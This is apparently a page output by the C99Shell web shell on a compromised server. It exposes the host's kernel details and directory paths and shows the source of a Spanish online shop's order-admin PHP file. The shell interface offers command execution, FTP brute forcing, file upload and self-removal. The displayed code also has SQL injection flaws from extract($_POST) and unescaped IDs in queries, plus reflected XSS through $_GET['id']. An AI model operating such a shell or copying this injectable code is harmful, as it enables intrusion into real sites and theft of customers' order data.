!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.26 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pedido-ver.php (7.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
header
('Access-Control-Allow-Origin: *');  //ara poder verlo desde shope
$pagina_actual="inicio";
$categoria_actual="inicio";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

if (isset(
$_POST["id"])){
    
    
extract($_POSTEXTR_SKIP);

  if (isset(
$_POST["submit_proceso"])){

      
$result=$mysqli->query("
      UPDATE pedido_carrito SET     
    encargado_proceso='"
.utf8_decode($encargado_proceso)."',
    encargado_proceso_fecha=NOW()
      WHERE id='
$id'
      "
);    

  }

  if (isset(
$_POST["submit_finalizar"])){

    
$result=$mysqli->query("
    UPDATE pedido_carrito SET   
    encargado_finalizar_fecha=NOW()
    WHERE id='
$id'
    "
); 

  }

    
header('Location: administrar-pedidos.php');
}

if (isset(
$_GET["id"])){
    
$id=cadena_segura($_GET["id"],11);
    
    
$result=$mysqli->query("
    SELECT c.id, c.fecha, c.total, u.email, c.tipo_envio, c.merchant_order_id, c.encargado_proceso, c.encargado_finalizar, c.encargado_proceso_fecha, c.encargado_finalizar_fecha, c.ip, c.total, cu.tipo, cu.valor, c.costo_envio,
  FORMAT(
        IF (cu.tipo IS NULL,(c.total+c.costo_envio),
            IF (cu.tipo='%',((100-cu.valor)*(c.total)/100)+c.costo_envio,(c.total+c.costo_envio-cu.valor))   
        ) 
    ,2) AS total_final
    FROM pedido_carrito c
    INNER JOIN usuario_carrito u ON u.id=c.id_usuario_carrito
  LEFT JOIN cupon cu ON cu.id=c.id_cupon
    WHERE c.id='
$id'
    "
);
    
$item mysqli_fetch_assoc($result);
    
    
$productos $mysqli->query("
    SELECT p.id, p.nombre, rpc.cantidad, rpc.precio, p.codigo, rpc.atributos, p.sku_individual
    FROM producto p
    INNER JOIN renglon_pedido_producto rpc ON rpc.id_producto=p.id
    WHERE rpc.id_pedido='"
.$item["id"]."'
"
);        
?>


<? if (isset($_GET["imprimir"])){?>

<head>

  <link href="http://fonts.googleapis.com/css?family=Raleway:600,800,400" rel="stylesheet" type="text/css">
    <!-- Bootstrap Core CSS -->
    <link href="bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">

    <!-- MetisMenu CSS -->
    <link href="bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link href="dist/css/sb-admin-2.css" rel="stylesheet">
    <link href="css/cds.css" rel="stylesheet" type="text/css">

    <!-- Custom Fonts -->
    <link href="bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">

</head>
<body>
  <img src="../contenido/logo_imprimir.jpg" alt="">
<? }?>

  <? if (!isset($_GET["imprimir"])){?>
    <div class="modal-content">
        <form method="post" action="pedido-ver.php">
        <input type="hidden" name="id" value="<?=$id?>">
        <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal">&times;</button>
            <h4 class="modal-title">Pedido realizado desde la web</h4>
        </div>
        <div class="modal-body">
            <div class="form-group">

            <? }?>
            <meta charset="utf-8">
                <h4><b>Orden de compra #<?=$item["id"]?></b><?=$item["merchant_order_id"]>0?' (Número de comprobante de marcadopago: '.$item["merchant_order_id"].')':""?></h4>
                <p><b>Tipo de envío:</b> <?=$item["tipo_envio"]?></p>
                <p><b>Fecha de compra:</b> <?=ver_fecha_mysql_lindo($item["fecha"])?></p>
                <p><b>IP:</b> <?=($item["ip"])?></p>
                <table border="1" class="table-padding-10">
                    <thead>
                      <tr><th>Código</th>
                      <th>
                        Producto
                      </th>
                      <th>
                        Cant</th>
                      <th>
                        Precio/u</th>
                      <th>
                        Total
                      </th>
                      </tr>
                    </thead>
                    <tbody>
                    <? while ($producto mysqli_fetch_assoc($productos)){?>
                      <tr>
                        <td>
                          <?=$producto["sku_individual"]?>
                        </td>
                        <td>
                          <?=utf8_encode($producto["nombre"]).utf8_encode($producto["atributos"])?>
                        </td>
                        <td>
                          <?=$producto["cantidad"]?>
                        </td>
                        <td>
                          <?=$producto["precio"]?>
                        </td>
                        <td>
                          <?=$producto["precio"]*$producto["cantidad"]?>
                        </td>
                      </tr>
                    <? }?>
                    </tbody>
                </table> 
                <br>
                <p><b>Total de productos:</b> $ <?=($item["total"])?></p>   
                <? if ($item["valor"]!=""){?>
                <p><b>Cupón de descuento:</b> - <?=($item["tipo"])?> <?=($item["valor"])?></p>   
                <? }?>
                <? if ($item["costo_envio"]!=""){?>
                <p><b>Costo envío:</b> $ <?=($item["costo_envio"])?></p>  
                <? }?>
                <br>
                <p><b>Total del pedido:</b> $ <?=($item["total_final"])?></p>

                <? if (!isset($_GET["imprimir"])){?>
            </div>   

            <? if (!isset($_GET["shope"])){?>

            <div class="row">
              <div class="col-md-12">
                <p><a class="btn btn-primary" href="pedido-ver.php?id=<?=$_GET["id"]?>&amp;imprimir=si" target="_blank">Imprimir pedido</a></p>   
              </div>
            </div> 

            <div class="form-group row">
              <div class="col-md-12">
                <h3>Estado del pedido</h3>
                <p>Recuerde verificar que el pedido este pago para comenzar a preparar el mismo. Ingrese su nombre para que otro operador sepa que alguien esta trabajando en el pedido.</p>
              </div>
              <div class="col-md-6">
                <input type="text" name="encargado_proceso" class="form-control" placeholder="Encargado" value="<?=$item["encargado_proceso"]!=""?utf8_encode($item["encargado_proceso"]):""?>">
              </div>
              <div class="col-md-6">
                <input name="submit_proceso" type="submit" class="btn btn-warning" value="En proceso">                
              </div>
            </div>

            <p style="
    margin-top: 6px;
"><?=$item["encargado_proceso_fecha"]!='0000-00-00 00:00:00'?"<b>Fecha de proceso:</b> ".ver_fecha_mysql_lindo($item["encargado_proceso_fecha"]):""?></p> 

            <input name="submit_finalizar" type="submit" class="btn btn-success" value="Finalizado">    

            <p style="
    margin-top: 6px;
"><?=$item["encargado_finalizar_fecha"]!='0000-00-00 00:00:00'?"<b>Fecha de finalización:</b> ".ver_fecha_mysql_lindo($item["encargado_finalizar_fecha"]):""?></p>  

            <? }?>

            
        </div>
        <div class="modal-footer">
          <a href="#" class="btn btn-" data-dismiss="modal">Cerrar</a>
        </div>
        </form>
    </div><!-- /.modal-content -->
  <? } else {?>
  <script>window.print();</script>  
  </body>
  <? }?>

<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0189 ]--